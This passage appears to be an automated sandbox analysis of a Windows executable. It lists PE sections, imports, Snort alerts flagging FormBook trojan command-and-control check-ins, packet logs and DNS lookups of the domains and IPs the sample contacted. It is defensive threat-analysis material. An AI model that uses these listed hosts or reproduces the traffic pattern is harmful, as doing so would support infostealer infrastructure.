                                                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                        Sections

                                                                                                                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                        .text0x10000x5aeb0x5c00False0.665123980978data6.42230569414IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                                        .rdata0x70000x11960x1200False0.458984375data5.20291736659IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                        .data0x90000x1b0380x600False0.432291666667data4.0475118296IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                        .ndata0x250000x80000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                        .rsrc0x2d0000xc800xe00False0.412109375data4.00712910454IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                        Resources

                                                                                                                        NameRVASizeTypeLanguageCountry
                                                                                                                        RT_ICON0x2d1d80x2e8dataEnglishUnited States
                                                                                                                        RT_DIALOG0x2d4c00x100dataEnglishUnited States
                                                                                                                        RT_DIALOG0x2d5c00x11cdataEnglishUnited States
                                                                                                                        RT_DIALOG0x2d6e00x60dataEnglishUnited States
                                                                                                                        RT_GROUP_ICON0x2d7400x14dataEnglishUnited States
                                                                                                                        RT_VERSION0x2d7580x254data
                                                                                                                        RT_MANIFEST0x2d9b00x2ccXML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States

                                                                                                                        Imports

                                                                                                                        DLLImport
                                                                                                                        KERNEL32.dllGetTickCount, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, SetFileAttributesA, CompareFileTime, SearchPathA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, GetWindowsDirectoryA, GetTempPathA, Sleep, lstrcmpiA, GetVersion, SetErrorMode, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, GetLastError, CreateDirectoryA, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, lstrcatA, GetSystemDirectoryA, WaitForSingleObject, SetFileTime, CloseHandle, GlobalFree, lstrcmpA, ExpandEnvironmentStringsA, GetExitCodeProcess, GlobalAlloc, lstrlenA, GetCommandLineA, GetProcAddress, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, ReadFile, FindClose, GetPrivateProfileStringA, WritePrivateProfileStringA, WriteFile, MulDiv, MultiByteToWideChar, LoadLibraryExA, GetModuleHandleA, FreeLibrary
                                                                                                                        USER32.dllSetCursor, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, EndDialog, ScreenToClient, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetForegroundWindow, GetWindowLongA, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, SetTimer, PostQuitMessage, SetWindowLongA, SendMessageTimeoutA, LoadImageA, wsprintfA, GetDlgItem, FindWindowExA, IsWindow, SetClipboardData, EmptyClipboard, OpenClipboard, EndPaint, CreateDialogParamA, DestroyWindow, ShowWindow, SetWindowTextA
                                                                                                                        GDI32.dllSelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                                                                                        SHELL32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, SHFileOperationA, ShellExecuteA
                                                                                                                        ADVAPI32.dllRegDeleteValueA, SetFileSecurityA, RegOpenKeyExA, RegDeleteKeyA, RegEnumValueA, RegCloseKey, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
                                                                                                                        COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                                                                                                        ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

                                                                                                                        Version Infos

                                                                                                                        DescriptionData
                                                                                                                        LegalCopyrightlieutenant
                                                                                                                        FileVersion9.7.6.5
                                                                                                                        CompanyNamestone
                                                                                                                        LegalTrademarksapologizes
                                                                                                                        Commentsfirearms
                                                                                                                        ProductNamegrandeur
                                                                                                                        FileDescriptionundoubtedly
                                                                                                                        Translation0x0000 0x04e4

                                                                                                                        Possible Origin

                                                                                                                        Language of compilation systemCountry where language is spokenMap
                                                                                                                        EnglishUnited States

                                                                                                                        Network Behavior

                                                                                                                        Snort IDS Alerts

                                                                                                                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                        06/22/21-18:25:02.550642TCP1201ATTACK-RESPONSES 403 Forbidden804975634.102.136.180192.168.2.6
                                                                                                                        06/22/21-18:25:07.827526TCP1201ATTACK-RESPONSES 403 Forbidden804975734.102.136.180192.168.2.6
                                                                                                                        06/22/21-18:25:18.311331TCP2031453ET TROJAN FormBook CnC Checkin (GET)4975980192.168.2.634.102.136.180
                                                                                                                        06/22/21-18:25:18.311331TCP2031449ET TROJAN FormBook CnC Checkin (GET)4975980192.168.2.634.102.136.180
                                                                                                                        06/22/21-18:25:18.311331TCP2031412ET TROJAN FormBook CnC Checkin (GET)4975980192.168.2.634.102.136.180
                                                                                                                        06/22/21-18:25:18.451876TCP1201ATTACK-RESPONSES 403 Forbidden804975934.102.136.180192.168.2.6
                                                                                                                        06/22/21-18:25:23.578876TCP2031453ET TROJAN FormBook CnC Checkin (GET)4976080192.168.2.634.102.136.180
                                                                                                                        06/22/21-18:25:23.578876TCP2031449ET TROJAN FormBook CnC Checkin (GET)4976080192.168.2.634.102.136.180
                                                                                                                        06/22/21-18:25:23.578876TCP2031412ET TROJAN FormBook CnC Checkin (GET)4976080192.168.2.634.102.136.180
                                                                                                                        06/22/21-18:25:23.719109TCP1201ATTACK-RESPONSES 403 Forbidden804976034.102.136.180192.168.2.6
                                                                                                                        06/22/21-18:25:39.828190TCP2031453ET TROJAN FormBook CnC Checkin (GET)4976680192.168.2.6172.67.129.33
                                                                                                                        06/22/21-18:25:39.828190TCP2031449ET TROJAN FormBook CnC Checkin (GET)4976680192.168.2.6172.67.129.33
                                                                                                                        06/22/21-18:25:39.828190TCP2031412ET TROJAN FormBook CnC Checkin (GET)4976680192.168.2.6172.67.129.33
                                                                                                                        06/22/21-18:25:51.038848TCP2031453ET TROJAN FormBook CnC Checkin (GET)4976880192.168.2.652.79.124.173
                                                                                                                        06/22/21-18:25:51.038848TCP2031449ET TROJAN FormBook CnC Checkin (GET)4976880192.168.2.652.79.124.173
                                                                                                                        06/22/21-18:25:51.038848TCP2031412ET TROJAN FormBook CnC Checkin (GET)4976880192.168.2.652.79.124.173
                                                                                                                        06/22/21-18:26:06.760886TCP1201ATTACK-RESPONSES 403 Forbidden804977175.2.81.221192.168.2.6
                                                                                                                        06/22/21-18:26:17.999823TCP1201ATTACK-RESPONSES 403 Forbidden804977334.102.136.180192.168.2.6

                                                                                                                        Network Port Distribution

                                                                                                                        TCP Packets

                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                        Jun 22, 2021 18:25:02.366617918 CEST4975680192.168.2.634.102.136.180
                                                                                                                        Jun 22, 2021 18:25:02.409193039 CEST804975634.102.136.180192.168.2.6
                                                                                                                        Jun 22, 2021 18:25:02.409516096 CEST4975680192.168.2.634.102.136.180
                                                                                                                        Jun 22, 2021 18:25:02.409568071 CEST4975680192.168.2.634.102.136.180
                                                                                                                        Jun 22, 2021 18:25:02.451952934 CEST804975634.102.136.180192.168.2.6
                                                                                                                        Jun 22, 2021 18:25:02.550642014 CEST804975634.102.136.180192.168.2.6
                                                                                                                        Jun 22, 2021 18:25:02.550687075 CEST804975634.102.136.180192.168.2.6
                                                                                                                        Jun 22, 2021 18:25:02.550992012 CEST4975680192.168.2.634.102.136.180
                                                                                                                        Jun 22, 2021 18:25:02.551043987 CEST4975680192.168.2.634.102.136.180
                                                                                                                        Jun 22, 2021 18:25:02.593966961 CEST804975634.102.136.180192.168.2.6
                                                                                                                        Jun 22, 2021 18:25:07.643510103 CEST4975780192.168.2.634.102.136.180
                                                                                                                        Jun 22, 2021 18:25:07.686371088 CEST804975734.102.136.180192.168.2.6
                                                                                                                        Jun 22, 2021 18:25:07.686568975 CEST4975780192.168.2.634.102.136.180
                                                                                                                        Jun 22, 2021 18:25:07.686913967 CEST4975780192.168.2.634.102.136.180
                                                                                                                        Jun 22, 2021 18:25:07.729299068 CEST804975734.102.136.180192.168.2.6
                                                                                                                        Jun 22, 2021 18:25:07.827526093 CEST804975734.102.136.180192.168.2.6
                                                                                                                        Jun 22, 2021 18:25:07.827579021 CEST804975734.102.136.180192.168.2.6
                                                                                                                        Jun 22, 2021 18:25:07.828515053 CEST4975780192.168.2.634.102.136.180
                                                                                                                        Jun 22, 2021 18:25:07.828553915 CEST4975780192.168.2.634.102.136.180
                                                                                                                        Jun 22, 2021 18:25:07.872838020 CEST804975734.102.136.180192.168.2.6
                                                                                                                        Jun 22, 2021 18:25:13.050292969 CEST4975880192.168.2.6213.186.33.5
                                                                                                                        Jun 22, 2021 18:25:13.103003979 CEST8049758213.186.33.5192.168.2.6
                                                                                                                        Jun 22, 2021 18:25:13.103123903 CEST4975880192.168.2.6213.186.33.5
                                                                                                                        Jun 22, 2021 18:25:13.103247881 CEST4975880192.168.2.6213.186.33.5
                                                                                                                        Jun 22, 2021 18:25:13.156203032 CEST8049758213.186.33.5192.168.2.6
                                                                                                                        Jun 22, 2021 18:25:13.156636000 CEST4975880192.168.2.6213.186.33.5
                                                                                                                        Jun 22, 2021 18:25:13.156657934 CEST4975880192.168.2.6213.186.33.5
                                                                                                                        Jun 22, 2021 18:25:13.209656954 CEST8049758213.186.33.5192.168.2.6
                                                                                                                        Jun 22, 2021 18:25:18.268053055 CEST4975980192.168.2.634.102.136.180
                                                                                                                        Jun 22, 2021 18:25:18.311075926 CEST804975934.102.136.180192.168.2.6
                                                                                                                        Jun 22, 2021 18:25:18.311197996 CEST4975980192.168.2.634.102.136.180
                                                                                                                        Jun 22, 2021 18:25:18.311331034 CEST4975980192.168.2.634.102.136.180
                                                                                                                        Jun 22, 2021 18:25:18.354171991 CEST804975934.102.136.180192.168.2.6
                                                                                                                        Jun 22, 2021 18:25:18.451875925 CEST804975934.102.136.180192.168.2.6
                                                                                                                        Jun 22, 2021 18:25:18.451911926 CEST804975934.102.136.180192.168.2.6
                                                                                                                        Jun 22, 2021 18:25:18.452157021 CEST4975980192.168.2.634.102.136.180
                                                                                                                        Jun 22, 2021 18:25:18.452346087 CEST4975980192.168.2.634.102.136.180
                                                                                                                        Jun 22, 2021 18:25:18.494915962 CEST804975934.102.136.180192.168.2.6
                                                                                                                        Jun 22, 2021 18:25:23.535876989 CEST4976080192.168.2.634.102.136.180
                                                                                                                        Jun 22, 2021 18:25:23.578468084 CEST804976034.102.136.180192.168.2.6
                                                                                                                        Jun 22, 2021 18:25:23.578567028 CEST4976080192.168.2.634.102.136.180
                                                                                                                        Jun 22, 2021 18:25:23.578876019 CEST4976080192.168.2.634.102.136.180
                                                                                                                        Jun 22, 2021 18:25:23.622807026 CEST804976034.102.136.180192.168.2.6
                                                                                                                        Jun 22, 2021 18:25:23.719109058 CEST804976034.102.136.180192.168.2.6
                                                                                                                        Jun 22, 2021 18:25:23.719168901 CEST804976034.102.136.180192.168.2.6
                                                                                                                        Jun 22, 2021 18:25:23.719352961 CEST4976080192.168.2.634.102.136.180
                                                                                                                        Jun 22, 2021 18:25:23.720000029 CEST4976080192.168.2.634.102.136.180
                                                                                                                        Jun 22, 2021 18:25:23.762451887 CEST804976034.102.136.180192.168.2.6
                                                                                                                        Jun 22, 2021 18:25:28.954170942 CEST4976180192.168.2.6169.62.77.158
                                                                                                                        Jun 22, 2021 18:25:29.143964052 CEST8049761169.62.77.158192.168.2.6
                                                                                                                        Jun 22, 2021 18:25:29.144161940 CEST4976180192.168.2.6169.62.77.158
                                                                                                                        Jun 22, 2021 18:25:29.144289017 CEST4976180192.168.2.6169.62.77.158
                                                                                                                        Jun 22, 2021 18:25:29.335238934 CEST8049761169.62.77.158192.168.2.6
                                                                                                                        Jun 22, 2021 18:25:29.339704037 CEST8049761169.62.77.158192.168.2.6
                                                                                                                        Jun 22, 2021 18:25:29.339749098 CEST8049761169.62.77.158192.168.2.6
                                                                                                                        Jun 22, 2021 18:25:29.339865923 CEST4976180192.168.2.6169.62.77.158
                                                                                                                        Jun 22, 2021 18:25:29.339929104 CEST4976180192.168.2.6169.62.77.158
                                                                                                                        Jun 22, 2021 18:25:29.529345036 CEST8049761169.62.77.158192.168.2.6
                                                                                                                        Jun 22, 2021 18:25:39.785697937 CEST4976680192.168.2.6172.67.129.33
                                                                                                                        Jun 22, 2021 18:25:39.827903032 CEST8049766172.67.129.33192.168.2.6
                                                                                                                        Jun 22, 2021 18:25:39.828003883 CEST4976680192.168.2.6172.67.129.33
                                                                                                                        Jun 22, 2021 18:25:39.828190088 CEST4976680192.168.2.6172.67.129.33
                                                                                                                        Jun 22, 2021 18:25:39.870101929 CEST8049766172.67.129.33192.168.2.6
                                                                                                                        Jun 22, 2021 18:25:39.894753933 CEST8049766172.67.129.33192.168.2.6
                                                                                                                        Jun 22, 2021 18:25:39.895276070 CEST4976680192.168.2.6172.67.129.33
                                                                                                                        Jun 22, 2021 18:25:39.895589113 CEST8049766172.67.129.33192.168.2.6
                                                                                                                        Jun 22, 2021 18:25:39.895711899 CEST4976680192.168.2.6172.67.129.33
                                                                                                                        Jun 22, 2021 18:25:39.937609911 CEST8049766172.67.129.33192.168.2.6
                                                                                                                        Jun 22, 2021 18:25:45.000245094 CEST4976780192.168.2.6166.88.88.176
                                                                                                                        Jun 22, 2021 18:25:45.191946030 CEST8049767166.88.88.176192.168.2.6
                                                                                                                        Jun 22, 2021 18:25:45.192121029 CEST4976780192.168.2.6166.88.88.176
                                                                                                                        Jun 22, 2021 18:25:45.192420959 CEST4976780192.168.2.6166.88.88.176
                                                                                                                        Jun 22, 2021 18:25:45.386563063 CEST8049767166.88.88.176192.168.2.6
                                                                                                                        Jun 22, 2021 18:25:45.386607885 CEST8049767166.88.88.176192.168.2.6
                                                                                                                        Jun 22, 2021 18:25:45.386637926 CEST8049767166.88.88.176192.168.2.6
                                                                                                                        Jun 22, 2021 18:25:45.386665106 CEST8049767166.88.88.176192.168.2.6
                                                                                                                        Jun 22, 2021 18:25:45.386687040 CEST8049767166.88.88.176192.168.2.6
                                                                                                                        Jun 22, 2021 18:25:45.386976957 CEST4976780192.168.2.6166.88.88.176
                                                                                                                        Jun 22, 2021 18:25:45.387248039 CEST4976780192.168.2.6166.88.88.176
                                                                                                                        Jun 22, 2021 18:25:45.577028990 CEST8049767166.88.88.176192.168.2.6
                                                                                                                        Jun 22, 2021 18:25:50.751912117 CEST4976880192.168.2.652.79.124.173
                                                                                                                        Jun 22, 2021 18:25:51.038350105 CEST804976852.79.124.173192.168.2.6
                                                                                                                        Jun 22, 2021 18:25:51.038614035 CEST4976880192.168.2.652.79.124.173
                                                                                                                        Jun 22, 2021 18:25:51.038847923 CEST4976880192.168.2.652.79.124.173
                                                                                                                        Jun 22, 2021 18:25:51.324135065 CEST804976852.79.124.173192.168.2.6
                                                                                                                        Jun 22, 2021 18:25:51.324237108 CEST804976852.79.124.173192.168.2.6
                                                                                                                        Jun 22, 2021 18:25:51.324249983 CEST804976852.79.124.173192.168.2.6
                                                                                                                        Jun 22, 2021 18:25:51.324599028 CEST4976880192.168.2.652.79.124.173
                                                                                                                        Jun 22, 2021 18:25:51.324770927 CEST4976880192.168.2.652.79.124.173
                                                                                                                        Jun 22, 2021 18:25:51.610224009 CEST804976852.79.124.173192.168.2.6
                                                                                                                        Jun 22, 2021 18:26:06.555407047 CEST4977180192.168.2.675.2.81.221
                                                                                                                        Jun 22, 2021 18:26:06.599483967 CEST804977175.2.81.221192.168.2.6
                                                                                                                        Jun 22, 2021 18:26:06.599612951 CEST4977180192.168.2.675.2.81.221
                                                                                                                        Jun 22, 2021 18:26:06.599775076 CEST4977180192.168.2.675.2.81.221
                                                                                                                        Jun 22, 2021 18:26:06.644592047 CEST804977175.2.81.221192.168.2.6
                                                                                                                        Jun 22, 2021 18:26:06.760885954 CEST804977175.2.81.221192.168.2.6
                                                                                                                        Jun 22, 2021 18:26:06.760915995 CEST804977175.2.81.221192.168.2.6
                                                                                                                        Jun 22, 2021 18:26:06.761118889 CEST4977180192.168.2.675.2.81.221
                                                                                                                        Jun 22, 2021 18:26:06.761343956 CEST4977180192.168.2.675.2.81.221
                                                                                                                        Jun 22, 2021 18:26:06.789345026 CEST804977175.2.81.221192.168.2.6

                                                                                                                        UDP Packets

                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                        Jun 22, 2021 18:24:00.034044981 CEST6134653192.168.2.68.8.8.8
                                                                                                                        Jun 22, 2021 18:24:00.094660997 CEST53613468.8.8.8192.168.2.6
                                                                                                                        Jun 22, 2021 18:24:01.139225006 CEST5177453192.168.2.68.8.8.8
                                                                                                                        Jun 22, 2021 18:24:01.198174000 CEST53517748.8.8.8192.168.2.6
                                                                                                                        Jun 22, 2021 18:24:02.101680040 CEST5602353192.168.2.68.8.8.8
                                                                                                                        Jun 22, 2021 18:24:02.155455112 CEST53560238.8.8.8192.168.2.6
                                                                                                                        Jun 22, 2021 18:24:02.998409033 CEST5838453192.168.2.68.8.8.8
                                                                                                                        Jun 22, 2021 18:24:03.048787117 CEST53583848.8.8.8192.168.2.6
                                                                                                                        Jun 22, 2021 18:24:04.183419943 CEST6026153192.168.2.68.8.8.8
                                                                                                                        Jun 22, 2021 18:24:04.241441965 CEST53602618.8.8.8192.168.2.6
                                                                                                                        Jun 22, 2021 18:24:05.152579069 CEST5606153192.168.2.68.8.8.8
                                                                                                                        Jun 22, 2021 18:24:05.205853939 CEST53560618.8.8.8192.168.2.6
                                                                                                                        Jun 22, 2021 18:24:06.185880899 CEST5833653192.168.2.68.8.8.8
                                                                                                                        Jun 22, 2021 18:24:06.243319988 CEST53583368.8.8.8192.168.2.6
                                                                                                                        Jun 22, 2021 18:24:07.209156990 CEST5378153192.168.2.68.8.8.8
                                                                                                                        Jun 22, 2021 18:24:07.268709898 CEST53537818.8.8.8192.168.2.6
                                                                                                                        Jun 22, 2021 18:24:08.178642988 CEST5406453192.168.2.68.8.8.8
                                                                                                                        Jun 22, 2021 18:24:08.235013962 CEST53540648.8.8.8192.168.2.6
                                                                                                                        Jun 22, 2021 18:24:09.148130894 CEST5281153192.168.2.68.8.8.8
                                                                                                                        Jun 22, 2021 18:24:09.199281931 CEST53528118.8.8.8192.168.2.6
                                                                                                                        Jun 22, 2021 18:24:10.063783884 CEST5529953192.168.2.68.8.8.8
                                                                                                                        Jun 22, 2021 18:24:10.123028040 CEST53552998.8.8.8192.168.2.6
                                                                                                                        Jun 22, 2021 18:24:11.019716024 CEST6374553192.168.2.68.8.8.8
                                                                                                                        Jun 22, 2021 18:24:11.101739883 CEST53637458.8.8.8192.168.2.6
                                                                                                                        Jun 22, 2021 18:24:12.446943045 CEST5005553192.168.2.68.8.8.8
                                                                                                                        Jun 22, 2021 18:24:12.514972925 CEST53500558.8.8.8192.168.2.6
                                                                                                                        Jun 22, 2021 18:24:13.694725990 CEST6137453192.168.2.68.8.8.8
                                                                                                                        Jun 22, 2021 18:24:13.747822046 CEST53613748.8.8.8192.168.2.6
                                                                                                                        Jun 22, 2021 18:24:14.620474100 CEST5033953192.168.2.68.8.8.8
                                                                                                                        Jun 22, 2021 18:24:14.673840046 CEST53503398.8.8.8192.168.2.6
                                                                                                                        Jun 22, 2021 18:24:15.526808023 CEST6330753192.168.2.68.8.8.8
                                                                                                                        Jun 22, 2021 18:24:15.583053112 CEST53633078.8.8.8192.168.2.6
                                                                                                                        Jun 22, 2021 18:24:16.860541105 CEST4969453192.168.2.68.8.8.8
                                                                                                                        Jun 22, 2021 18:24:16.919770956 CEST53496948.8.8.8192.168.2.6
                                                                                                                        Jun 22, 2021 18:24:18.071145058 CEST5498253192.168.2.68.8.8.8
                                                                                                                        Jun 22, 2021 18:24:18.124247074 CEST53549828.8.8.8192.168.2.6
                                                                                                                        Jun 22, 2021 18:24:20.092732906 CEST5001053192.168.2.68.8.8.8
                                                                                                                        Jun 22, 2021 18:24:20.148947001 CEST53500108.8.8.8192.168.2.6
                                                                                                                        Jun 22, 2021 18:24:32.629328012 CEST6371853192.168.2.68.8.8.8
                                                                                                                        Jun 22, 2021 18:24:32.698751926 CEST53637188.8.8.8192.168.2.6
                                                                                                                        Jun 22, 2021 18:24:53.409738064 CEST6211653192.168.2.68.8.8.8
                                                                                                                        Jun 22, 2021 18:24:53.559686899 CEST53621168.8.8.8192.168.2.6
                                                                                                                        Jun 22, 2021 18:24:54.466840982 CEST6381653192.168.2.68.8.8.8
                                                                                                                        Jun 22, 2021 18:24:54.624713898 CEST53638168.8.8.8192.168.2.6
                                                                                                                        Jun 22, 2021 18:24:55.251815081 CEST5501453192.168.2.68.8.8.8
                                                                                                                        Jun 22, 2021 18:24:55.316796064 CEST53550148.8.8.8192.168.2.6
                                                                                                                        Jun 22, 2021 18:24:55.794864893 CEST6220853192.168.2.68.8.8.8
                                                                                                                        Jun 22, 2021 18:24:55.855622053 CEST53622088.8.8.8192.168.2.6
                                                                                                                        Jun 22, 2021 18:24:55.968133926 CEST5757453192.168.2.68.8.8.8
                                                                                                                        Jun 22, 2021 18:24:56.027344942 CEST53575748.8.8.8192.168.2.6
                                                                                                                        Jun 22, 2021 18:24:56.043406963 CEST5181853192.168.2.68.8.8.8
                                                                                                                        Jun 22, 2021 18:24:56.121126890 CEST53518188.8.8.8192.168.2.6
                                                                                                                        Jun 22, 2021 18:24:56.237652063 CEST5662853192.168.2.68.8.8.8
                                                                                                                        Jun 22, 2021 18:24:56.300812960 CEST53566288.8.8.8192.168.2.6
                                                                                                                        Jun 22, 2021 18:24:56.397944927 CEST6077853192.168.2.68.8.8.8
                                                                                                                        Jun 22, 2021 18:24:56.466319084 CEST53607788.8.8.8192.168.2.6
                                                                                                                        Jun 22, 2021 18:24:56.508342028 CEST5379953192.168.2.68.8.8.8
                                                                                                                        Jun 22, 2021 18:24:56.573071003 CEST53537998.8.8.8192.168.2.6
                                                                                                                        Jun 22, 2021 18:24:56.601552963 CEST5468353192.168.2.68.8.8.8
                                                                                                                        Jun 22, 2021 18:24:56.654877901 CEST53546838.8.8.8192.168.2.6
                                                                                                                        Jun 22, 2021 18:24:56.749758959 CEST5932953192.168.2.68.8.8.8
                                                                                                                        Jun 22, 2021 18:24:56.824110985 CEST53593298.8.8.8192.168.2.6
                                                                                                                        Jun 22, 2021 18:24:57.171281099 CEST6402153192.168.2.68.8.8.8
                                                                                                                        Jun 22, 2021 18:24:57.239022017 CEST53640218.8.8.8192.168.2.6
                                                                                                                        Jun 22, 2021 18:24:57.662734032 CEST5612953192.168.2.68.8.8.8
                                                                                                                        Jun 22, 2021 18:24:57.722476006 CEST53561298.8.8.8192.168.2.6
                                                                                                                        Jun 22, 2021 18:24:58.639910936 CEST5817753192.168.2.68.8.8.8
                                                                                                                        Jun 22, 2021 18:24:58.690794945 CEST53581778.8.8.8192.168.2.6
                                                                                                                        Jun 22, 2021 18:24:59.686248064 CEST5070053192.168.2.68.8.8.8
                                                                                                                        Jun 22, 2021 18:24:59.747941971 CEST53507008.8.8.8192.168.2.6
                                                                                                                        Jun 22, 2021 18:25:00.317605972 CEST5406953192.168.2.68.8.8.8
                                                                                                                        Jun 22, 2021 18:25:00.377165079 CEST53540698.8.8.8192.168.2.6
                                                                                                                        Jun 22, 2021 18:25:00.581388950 CEST6117853192.168.2.68.8.8.8
                                                                                                                        Jun 22, 2021 18:25:00.643455029 CEST53611788.8.8.8192.168.2.6
                                                                                                                        Jun 22, 2021 18:25:02.295726061 CEST5701753192.168.2.68.8.8.8
                                                                                                                        Jun 22, 2021 18:25:02.361603022 CEST53570178.8.8.8192.168.2.6
                                                                                                                        Jun 22, 2021 18:25:07.573002100 CEST5632753192.168.2.68.8.8.8
                                                                                                                        Jun 22, 2021 18:25:07.642466068 CEST53563278.8.8.8192.168.2.6
                                                                                                                        Jun 22, 2021 18:25:12.875062943 CEST5024353192.168.2.68.8.8.8
                                                                                                                        Jun 22, 2021 18:25:12.949099064 CEST53502438.8.8.8192.168.2.6
                                                                                                                        Jun 22, 2021 18:25:18.198398113 CEST6205553192.168.2.68.8.8.8
                                                                                                                        Jun 22, 2021 18:25:18.266730070 CEST53620558.8.8.8192.168.2.6
                                                                                                                        Jun 22, 2021 18:25:23.461308002 CEST6124953192.168.2.68.8.8.8
                                                                                                                        Jun 22, 2021 18:25:23.532597065 CEST53612498.8.8.8192.168.2.6
                                                                                                                        Jun 22, 2021 18:25:28.739301920 CEST6525253192.168.2.68.8.8.8
                                                                                                                        Jun 22, 2021 18:25:28.953159094 CEST53652528.8.8.8192.168.2.6
                                                                                                                        Jun 22, 2021 18:25:34.369805098 CEST6436753192.168.2.68.8.8.8
                                                                                                                        Jun 22, 2021 18:25:34.678531885 CEST53643678.8.8.8192.168.2.6
                                                                                                                        Jun 22, 2021 18:25:37.898433924 CEST5506653192.168.2.68.8.8.8
                                                                                                                        Jun 22, 2021 18:25:37.977202892 CEST53550668.8.8.8192.168.2.6
                                                                                                                        Jun 22, 2021 18:25:38.901002884 CEST6021153192.168.2.68.8.8.8
                                                                                                                        Jun 22, 2021 18:25:38.975933075 CEST53602118.8.8.8192.168.2.6
                                                                                                                        Jun 22, 2021 18:25:39.699645996 CEST5657053192.168.2.68.8.8.8
                                                                                                                        Jun 22, 2021 18:25:39.783648968 CEST53565708.8.8.8192.168.2.6
                                                                                                                        Jun 22, 2021 18:25:44.923053980 CEST5845453192.168.2.68.8.8.8
                                                                                                                        Jun 22, 2021 18:25:44.998709917 CEST53584548.8.8.8192.168.2.6
                                                                                                                        Jun 22, 2021 18:25:50.441529036 CEST5518053192.168.2.68.8.8.8
                                                                                                                        Jun 22, 2021 18:25:50.750444889 CEST53551808.8.8.8192.168.2.6
                                                                                                                        Jun 22, 2021 18:26:00.962518930 CEST5872153192.168.2.68.8.8.8
                                                                                                                        Jun 22, 2021 18:26:01.023313046 CEST53587218.8.8.8192.168.2.6
                                                                                                                        Jun 22, 2021 18:26:01.347481966 CEST5769153192.168.2.68.8.8.8
                                                                                                                        Jun 22, 2021 18:26:01.425106049 CEST53576918.8.8.8192.168.2.6
                                                                                                                        Jun 22, 2021 18:26:01.534457922 CEST5294353192.168.2.68.8.8.8
                                                                                                                        Jun 22, 2021 18:26:01.609908104 CEST53529438.8.8.8192.168.2.6
                                                                                                                        Jun 22, 2021 18:26:06.486386061 CEST5948953192.168.2.68.8.8.8
                                                                                                                        Jun 22, 2021 18:26:06.553442001 CEST53594898.8.8.8192.168.2.6
                                                                                                                        Jun 22, 2021 18:26:11.774780035 CEST6402253192.168.2.68.8.8.8
                                                                                                                        Jun 22, 2021 18:26:11.852895021 CEST53640228.8.8.8192.168.2.6
                                                                                                                        Jun 22, 2021 18:26:17.734756947 CEST6002353192.168.2.68.8.8.8
                                                                                                                        Jun 22, 2021 18:26:17.813395023 CEST53600238.8.8.8192.168.2.6

                                                                                                                        DNS Queries

                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                        Jun 22, 2021 18:25:02.295726061 CEST192.168.2.68.8.8.80xaf89Standard query (0)www.invisiongc.netA (IP address)IN (0x0001)
                                                                                                                        Jun 22, 2021 18:25:07.573002100 CEST192.168.2.68.8.8.80x7d4cStandard query (0)www.killrstudio.comA (IP address)IN (0x0001)
                                                                                                                        Jun 22, 2021 18:25:12.875062943 CEST192.168.2.68.8.8.80x6cadStandard query (0)www.ivoirepneus.comA (IP address)IN (0x0001)
                                                                                                                        Jun 22, 2021 18:25:18.198398113 CEST192.168.2.68.8.8.80x5255Standard query (0)www.extinctionbrews.comA (IP address)IN (0x0001)
                                                                                                                        Jun 22, 2021 18:25:23.461308002 CEST192.168.2.68.8.8.80x14f9Standard query (0)www.cindywillardrealtor.comA (IP address)IN (0x0001)
                                                                                                                        Jun 22, 2021 18:25:28.739301920 CEST192.168.2.68.8.8.80x2779Standard query (0)www.doityourselfism.comA (IP address)IN (0x0001)
                                                                                                                        Jun 22, 2021 18:25:34.369805098 CEST192.168.2.68.8.8.80x5716Standard query (0)www.saludflv.infoA (IP address)IN (0x0001)
                                                                                                                        Jun 22, 2021 18:25:39.699645996 CEST192.168.2.68.8.8.80xc48eStandard query (0)www.builtbydawn.comA (IP address)IN (0x0001)
                                                                                                                        Jun 22, 2021 18:25:44.923053980 CEST192.168.2.68.8.8.80xeaa6Standard query (0)www.qq66520.comA (IP address)IN (0x0001)
                                                                                                                        Jun 22, 2021 18:25:50.441529036 CEST192.168.2.68.8.8.80xf777Standard query (0)www.mzyxi-rkah-y.netA (IP address)IN (0x0001)
